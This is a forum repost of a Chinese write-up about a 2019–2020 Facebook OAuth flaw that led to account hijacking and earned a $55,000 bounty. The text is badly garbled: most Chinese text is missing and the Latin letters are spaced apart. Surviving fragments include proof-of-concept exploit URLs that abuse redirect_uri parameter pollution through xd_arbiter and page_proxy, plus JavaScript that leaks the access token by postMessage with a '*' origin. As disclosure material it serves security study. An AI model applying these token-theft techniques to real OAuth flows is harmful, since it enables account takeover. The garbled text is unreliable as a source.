[15322] 2020-05-02_FacebookOAuth漏洞导致的Facebook账户劫持

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2020-05-02_FacebookOAuth漏洞导致的Facebook账户劫持 F a c e b o o k   O A u t h F a c e b o o k c l o u d s   F r e e B u f   2 0 2 0 - 0 5 - 0 2 L o g i n   w i t h   F a c e b o o k U R L F a c e b o o k F a c e b o o k   O A u t h F a c e b o o k   O A u t h F a c e b o o k $ 5 5 , 0 0 0 g o o g l e S t a c k O v e r f l o w 线 线 9 1 0 L o g i n   w i t h   F a c e b o o k O A u t h   2 . 0 f a c e b o o k . c o m t o k e n t o k e n f a c e b o o k . c o m O A u t h a c c e s s   t o k e n F a c e b o o k A P P I n s t a g r a m ,   O c u l u s ,   N e t f l i x ,   T i n d e r ,   S p o t i f y a c c e s s _ t o k e n 访 P O C F a c e b o o k S D K / c o n n e c t / p i n g u s e r _ a c c e s s F a c e b o o k X D _ A r b i t e r F a c e b o o k S D K 便 p r o x y   i f r a m e   p o s t M e s s a g e ( )   A P I t o k e n / c o n n e c t / p i n g h t t p s : / / w w w . f a c e b o o k . c o m / c o n n e c t / p i n g ? c l i e n t _ i d = A P P _ I D & r e d i r e c t _ u r i = h t t p s % 3 A % 2 F % 2 F s t a t i c x x . f a c e b o o k . c o m % 2 F c o n n e c t % 2 F x d _ a r b i t e r . p h p % 3 F v e r s i o n % 3 D 4 2 % 2 3 o r i g i n % 3 D h t t p s % 2 5 3 A % 2 5 2 F % 2 5 2 F w w w . d o m a i n . c o m p a r a m e t e r   p o l l u t i o n 使   x d _ a r b i t e r . p h p ? v = 4 2 x d _ a r b i t e r / ? v = 4 2 线 t o k e n l o c a t i o n . h a s h p o s t M e s s a g e ( )   A P I F a c e b o o k p a g e _ p r o x y   h t t p s : / / s t a t i c x x . f a c e b o o k . c o m / p l a t f o r m / p a g e _ p r o x y / r / 7 S W B A v H e n E n . j s p a g e _ p r o x y E v e n t L i s t e n e r p o s t M e s s a g e ( ) f r a m e N a m e   E x p l o i t i n g   P r o x y   p a g e _ p r o x y p a g e _ p r o x y x d _ a r b i t e r h t t p s : / / s t a t i c x x . f a c e b o o k . c o m / p l a t f o r m / p a g e _ p r o x y / r / 7 S W B A v H e n E n . j s h t t p s : / / s t a t i c x x . f a c e b o o k . c o m / c o n n e c t / x d _ a r b i t e r . p h p ? v e r s i o n = 4 2 h t t p s : / / s t a t i c x x . f a c e b o o k . c o m / c o n n e c t / x d _ a r b i t e r / r / 7 S W B A v H e n E n . j s ? v e r s i o n = 4 2 H T T P X - F r a m e - O p t i o n s w i n d o w . p a r e n t w i n d o w . o p e n O a u t h F a c e b o o k C u s t o m _ S D K . j s J S a c c e s s _ t o k e n v a r   f r a m e N a m e   =   w i n d o w . l o c a t i o n . h r e f . s p l i t ( " # " ) [ 1 ] ;         w i n d o w . p a r e n t . p o s t M e s s a g e ( f r a m e N a m e , " * " ) ; v a r   a p p _ i d   =   ' 1 2 4 0 2 4 5 7 4 2 8 7 4 1 4 ' ,         a p p _ d o m a i n   =   ' w w w . i n s t a g r a m . c o m ' ;         v a r   e x p l o i t _ u r l   =   ' h t t p s : / / w w w . f a c e b o o k . c o m / c o n n e c t / p i n g ? c l i e n t _ i d = '   +   a p p _ i d   +   ' & r e d i r e c t _ u r i = h t t p s % 3 A % 2 F % 2 F s t a t i c x x . f a c e b o o k . c o m % 2 F c o n n e c t % 2 F x d _ a r b i t e r % 2 F r % 2 F 7 S W B A v H e n E n . j s % 3 F v e r s i o n % 3 D 4 4 % 2 3 o r i g i n % 3 D h t t p s % 2 5 3 A % 2 5 2 F % 2 5 2 F '
F a c e b o o k g r a p h q l t o k e n F a c e b o o k F a c e b o o k G r a p h Q L F a c e b o o k F a c e b o o k F a c e b o o k / c o n n e c t / p i n g F a c e b o o k a c c e s s _ t o k e n X D _ A r b i t e r _ _ d ( J S S D K C o n f i g ) p a g e _ p r o x y J S F a c e b o o k O A u t h / d i a l o g / o a u t h / t o k e n p a g e _ p r o x y F a c e b o o k x d _ a r b i t e r t o k e n p a g e _ p r o x y _ _ d ( J S S D K C o n f i g ) p o s t M e s s a g e ( ) w w w . f a c e b o o k . c o m x d _ a r b i t e r c l o s e d _ w i n d o w     p o s t M e s s a g e ( )   c h r o m e m m u l t i - i n s t a l l m o b i l e t o u c h f i r e f o x m b a s i c . f a c b o o k . c o m H T T P   3 0 2 h t t p s : / / m b a s i c . f a c e b o o k . c o m / d i a l o g / o a u t h ? c l i e n t _ i d = 1 2 4 0 2 4 5 7 4 2 8 7 4 1 4 & r e d i r e c t _ u r i = h t t p s % 3 A % 2 F % 2 F s t a t i c x x . f a c e b o o k . c o m % 2 F c o n n e c t % 2 F x d _ a r b i t e r % 2 F r % 2 F 7 S W B A v H e n E n . j s % 3 F v e r s i o n % 3 D 4 2 % 2 3 o r i g i n % 3 D h t t p s % 2 5 3 A % 2 5 2 F % 2 5 2 F w w w . i n s t a g r a m . c o m % 2 5 2 F x d _ a r b i t e r x d _ a r b i t e r . p h p x d _ a r b i t e r H T T P p a g e _ p r o x y 7 S W B A v H e n E n . j s J S 访 使 F a c e b o o k O a u t h F a c e b o o k   a c c e s s   t o k e n F a c e b o o k 2 0 1 9 . 1 2 . 1 6       2 0 1 9 . 1 2 . 1 6       2 0 1 9 . 1 2 . 2 3       2 0 2 0 . 1 . 3           2 0 2 0 . 1 . 1 0         2 0 2 0 . 1 . 1 7         2 0 2 0 . 2 . 2 1       F a c e b o o k $ 5 5 , 0 0 0 * a m o l b a i k a r c l o u d s     F r e e B u f . C O M

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则